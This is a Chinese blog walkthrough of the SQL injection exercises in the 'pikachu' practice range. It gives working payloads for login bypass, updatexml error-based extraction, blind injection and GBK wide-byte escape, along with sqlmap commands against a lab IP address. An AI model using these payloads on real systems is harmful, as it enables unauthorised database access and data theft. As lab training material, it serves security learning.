4.SQL注入

已于 2023-02-02 11:38:28 修改
阅读量138 收藏
点赞数
分类专栏: pikachu通关练习 文章标签: sql 数据库 java
于 2022-12-16 17:22:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41826065/article/details/128299111
版权

3.sql注入

1.数字型注入

  1. 点击搜索,进行抓包
    在这里插入图片描述
  2. 修改id,判断注入类型

将id改为1’ ,根据报错信息,判断注入类型是数字型
在这里插入图片描述
3. 查询数据库名称、版本,注入成功
在这里插入图片描述

2.字符型注入

SELECT 字段1,字段2,from table where username= ’ xxx’
输入1‘,根据报错信息判断是字符型注入
在这里插入图片描述
2.输入万能密码**'or 1=1#**

Select * From 用户表 Where UserName=xxx 'or 1=1#

万能密码解释:or是或者的意思,也就是UserName=xxx的时候可以登录,也可以是1=1的时候可以登录,要知道,1永远等于1,所以登录条件永远成立,所以永远可以登录。(#代表注释掉后面的内容)
在这里插入图片描述

3. 搜索型注入

select * from table where username like '%xxx% '

  1. 输入单引号‘ ,查看报错信息,根据报错信息判断可以注入
    在这里插入图片描述
  2. 报错信息出现%,判断是搜索型注入,输入k% ' or 1=1#,进行查询
    在这里插入图片描述

4.XX型注入

where username = ('lucy')
输入1’)or 1=1#
在这里插入图片描述

5. insert/update注入

5.1 insert

  1. 注册,进行抓包
    在这里插入图片描述
  2. payload注入username
username=111' and updatexml(1,concat(0x7e,database(),0x7e),1) and '

这里在第二个and后使用单引号的目的是:111后的引号闭合sql语句数据前面的引号;and后的引号闭合sql语句数据最后的引号;

在这里插入图片描述
0x7e这个十六进制数代表符号这个符号在xpath语法中是不存在的,因此总能报错。同理,肯定也有其他字符是XPATH语法不支持的。 ! 也是不支持的,因此也可以使用。
在这里插入图片描述

  1. 成功爆破出数据库名
    在这里插入图片描述

5.2 update

  1. 点击修改个人信息
    在这里插入图片描述
  2. 抓包
    在这里插入图片描述
  3. payload注入sex
    在这里插入图片描述

6.delete 注入

payload: updatexml(1,concat(0x7e,database()),1)
在这里插入图片描述

7.http header注入

  1. admin/123456 进行登录
    在这里插入图片描述
    这里把http的头信息存到数据库里面去了,但是存进去之前没有进行转义,导致SQL注入漏洞

  2. 登陆时进行抓包
    在这里插入图片描述
    3.利用payload,修改头部信息

1' or  updatexml(1,concat(0x7e,database()),1) or '

在这里插入图片描述

8.盲注(base on boolian)

盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行半段或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类:
基于布尔的SQL盲注-逻辑判断(优先级:2) regexp,like,ascii,left,ord,mid
基于时间的SQL盲注-延时判断(优先级:3) if,sleep 基于报错的SQL盲注-报错回显(优先级:1)
报错注入函数:floor,updatexml,extractvalue

布尔盲注往往是在不支持union查询或者回显页面不显示具体信息,只返回正常与不正常两种页面形式时进行的注入方法,通过使用and、or连接判断长度和ASCII码值的方式对数据库的信息进行判断。

name=1 正常回显
name=1’ 不报错,但提示用户名不存在
name=1’# 正常回显
判断该注入为布尔盲注,且闭合为单引号。

  1. payload:kobe' and length(database())>1# 判断数据库长度:即当数据库名长度是否大于1,若大于1则为真,回显正常。
    在这里插入图片描述
  2. 经过尝试,得知数据库长度为7,利用sqlmap工具爆破数据库名
sqlmap.py -u "http://124.220.31.77:8000/vul/sqli/sqli_blind_b.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2" --current-db

爆破结果为pikachu
在这里插入图片描述

9.盲注(base on time)

利用sqlmap

"http://124.220.31.77:8000/vul/sqli/sqli_blind_t.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2#" --current-db

在这里插入图片描述

10.宽字节注入

在数据库中使用了宽字符集(GBK,GB2312等),除了英文都是一个字符占两字节;
MySQL在使用GBK编码的时候,会认为两个字符为一个汉字(ascii>128才能达到汉字范围);
在PHP中使用addslashes函数的时候,会对单引号%27进行转义,在前边加一个反斜杠”\”,变成%5c%27;
可以在前边添加%df,形成%df%5c%27,而数据进入数据库中时前边的%df%5c两字节会被当成一个汉字;
%5c被吃掉了,单引号由此逃逸可以用来闭合语句。
使用PHP函数**iconv(‘utf-8’,‘gbk’,$_GET[‘id’]),**也可能导致注入产生

  1. 输入kobe‘进行抓包
    在这里插入图片描述

  2. payload:name=kobe%df’ or 1=1#
    在这里插入图片描述

RainaHacker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微e-cology9 browser.jsp SQL注入漏洞
Myu_wzy的博客
03-20 1686
泛微e-cology9存在SQL注入漏洞,经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
(白帽子学习笔记)前渗透——SQL注入
冬的博客
08-23 771
注入详解 目录 注入详解 SQL注入 SQL注入漏洞的产生必须满足两个条件: SQL注入漏洞的危害 注入判断: SQL注入类型: 数字型: 字符型: 布尔盲注: 时间盲注: 报错注入: 联合注入: 堆查询注入: 宽字节注入: 按注入点类型 数字型 字符型 搜索型 按执行效果类型 布尔盲注 时间盲注 报错注入 宽字节注入 DNSlog外带 sqli-labs部分总结 第五关——基于'字符型报错 第六关——基于"字符型报错 第七关——文件读写注入 第八
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
「 典型安全漏洞系列 」02.SQL注入详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-11 2046
SQL注入是一种利用应用程序对用户输入的处理不当,使恶意用户能够执行未经授权的SQL查询的行为。当应用程序从用户那里接收输入并将其直接用作SQL查询的一部分时,就可能发生SQL注入,使得攻击者能够干扰应用程序对数据库的正常查询,甚至可访问敏感数据,引起数据泄露。执行外部参数拼接的SQL语句;执行外部传入的整条SQL语句;在配置文件SQL语句没有使用预编译方式占位符;校验函数有缺陷或占位符使用错误。比如,通过输入,若应用程序正常返回,说明version()被数据库识别并执行。因。
SQL 注入攻击介绍
代码星辰的博客
03-12 4681
SQL 注入攻击介绍
SQL注入攻击与防护
weixin_62707591的博客
06-21 5779
攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,并且插入的恶意SQL命令会导致原有SQL语句作用发生改变,从而得到欺骗服务器执行恶意SQL命令的一种攻击方式。① 概述开源的自动化SQL注入工具,由Python写成② 主要功能扫描、发现、利用给定URL的SQL注入漏洞③ 特点。
SQL注入攻击介绍
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
SQL注入
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入SQL lnjection)是发生在Web程序数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串添加SQL语句,如果在设计不良的程序忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
SQL注入漏洞详解
m0_56822024的博客
07-08 9335
SQL注入漏洞主要形成的原因是Web应用程序对用户的输入没有做严格的判断,导致用户可用将非法的SQL语句拼接到正常的语句,被当作SQL语句的一部分执行。
Sql注入-1:sql注入基本原理
jiege1998的博客
09-04 2257
目录 前言 一、SQL注入介绍 二、学习环境介绍 三、SQL注入原理 总结 前言 在网络安全领域sql注入是一个无法被忽视的关键点,曾经多少的网站都因此被攻破,直到现在很多网站依旧存在很多sql注入的漏洞和风险点。Sql注入的原理简单,但变化和危害特别严重,属于“上有政策,下有对策”的风险点,也是从事渗透攻防必不可少的一个知识点。本人因近期学习渗透测试相关内容,特此记录学习过程的笔记,若你也是刚入门渗透安全,或许会有帮助,也希望可以一起交流。 一、SQL注入介绍 ...
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
教主Kali与Python黑客.6.WEB攻击.4.SQL注入
10-14
教主Kali与Python黑客.6.WEB攻击.4.SQL注入
2.SQL注入.md
05-31
玄魂磐石计划课程陈殷课件 常用SQL注入操作,基于DVWA漏洞系统源码分析 --------------------------------- md文件
SQL 注入天书.pdf
08-06
Less-1至Less-4逐步引导用户了解如何通过构造恶意输入来执行未授权的数据库查询,揭示了SQL注入的基本攻击手法。 **盲注讲解(Blind Injection)** Background-2介绍了盲注,这是一种更为隐蔽的注入方式,攻击者在...
sql注入讲解ppt.pptx
08-10
4. 操作方便:SQL 注入攻击可以通过简单的输入来实现,攻击者可以使用自动化工具来快速实现攻击。 二、SQL 注入基础知识: 1. PHP 语言基础:了解 PHP 语言的基础知识,熟悉 MySQL 的一些函数和语句。 2. MySQL ...
Dav_笔记12:Automatic SQL Tuning 之 5 managing SQL Profiles
最新发布
Dav_2099的博客
08-07 451
SQL配置文件包含对自动SQL调整期间发现的较差优化程序估计值的更正。此信息可以改进优化器基数和选择性估计,从而导致优化器选择更好的计划。SQL配置文件不包含有关各个执行计划的信息。相反,优化程序在选择计划时具有以下信息源:■环境,包含数据库配置,绑定变量值,优化程序统计信息,数据集等■SQL配置文件的补充统计信息如果环境或SQL配置文件发生更改,则优化程序可以创建新计划。您可以使用SQL配置文件,无论是否有SQL计划管理。如果使用SQL计划管理,则优化程序选择的计划必须是已启用的计划基准。
postgresql 分组合并 字段
cuisidong1997的博客
08-04 244
如果你想要合并的不是字符串字段,而是其他类型的字段,比如数字或日期,你也可以使用string_agg,但是需要将这些值转换为字符串。在PostgreSQL,如果你想要将多个行的字段值合并为一个字段,你可以使用string_agg函数。这个函数可以将同一个组内的指定字段的值连接成一个字符串,并且可以自定义连接符。在这个例子,array_agg将所有的薪资值收集到一个数组,然后array_to_string将这个数组转换为一个由逗号分隔的字符串。postgresql 分组合并 字段。
dbeaver 导入sql 报错,ERROR 2059 (HY000)
hyq_07_27的博客
08-07 100
ERROR 2059 (HY000): Authentication plugin ‘caching_sha2_password’ cannot be loaded: 鎵句笉鍒版寚瀹氱殑妯″潡銆�。下载后解压压缩包,点击“添加数据库地址”按钮,选择新的MySQL8的所在目录.再次导入就可以了。可以下载 MySQL免安装版配置教程mysql-8.0.39-winx64.zip。先mysql连接设置,查看一下dbeaver的mysql 版本,是5.5.62.版本问题,MySQL8之后更换了密码认证策略。
力扣SQL50 修复表的名字 字符串函数
人言束负
08-03 323
【代码】力扣SQL50 修复表的名字 字符串函数。
1.SQL注入原理
05-30
SQL注入是一种常见的攻击方式,它的原理是通过在Web应用程序输入恶意的SQL语句,从而实现非法的数据库操作。攻击者可以通过这种方式获取应用程序的敏感信息,或者对数据库进行恶意操作。 其实现原理是利用Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值